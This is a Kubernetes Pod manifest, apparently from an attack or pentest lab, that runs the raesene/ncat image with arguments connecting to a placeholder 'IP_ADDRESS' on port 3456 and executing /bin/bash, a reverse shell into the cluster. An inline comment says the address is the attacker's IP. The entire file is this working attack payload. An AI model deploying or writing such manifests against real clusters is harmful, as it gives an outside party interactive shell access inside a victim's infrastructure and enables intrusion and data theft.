apiVersion: v1
kind: Pod
metadata:
  name: rs-pod
  namespace: dev
  labels:
    app: ncat
spec:
  containers:
    - name: rs-pod
      image: raesene/ncat
      args: ["IP_ADDRESS", "3456", "-e", "/bin/bash"] # IP address is attacker IP, change it
